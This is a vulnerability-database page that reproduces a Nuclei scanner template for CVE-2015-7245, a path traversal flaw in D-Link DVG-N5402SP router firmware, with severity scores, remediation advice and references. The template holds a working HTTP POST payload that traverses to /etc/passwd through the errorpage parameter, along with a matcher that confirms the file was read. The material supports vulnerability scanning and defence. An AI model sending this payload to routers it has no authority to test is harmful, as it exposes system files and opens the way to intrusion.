Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-7245
HistoryAug 16, 2022 - 2:32 a.m.

D-Link DVG-N5402SP - Local File Inclusion

2022-08-1602:32:51
ProjectDiscovery
github.com
4

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.2 High

AI Score

Confidence

High

0.964 High

EPSS

Percentile

99.6%

D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.
id: CVE-2015-7245

info:
  name: D-Link DVG-N5402SP - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.
  impact: |
    An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information.
  remediation: |
    Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability.
  reference:
    - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
    - https://www.exploit-db.com/exploits/39409/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-7245
    cwe-id: CWE-22
    epss-score: 0.96378
    epss-percentile: 0.99562
    cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: d-link
    product: dvg-n5402sp_firmware
  tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link

http:
  - raw:
      - |
        POST /cgibin/webproc HTTP/1.1
        Host: {{Hostname}}

        getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022008bab1004e34f044c74689230de8f4d39ef776246196710ce3b9dc0485bb7b65022100a1b73bfc5f2610fc20d5b2d111a819fb675d8fc62d9c3411507de1aa1cbafe8e:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.2 High

AI Score

Confidence

High

0.964 High

EPSS

Percentile

99.6%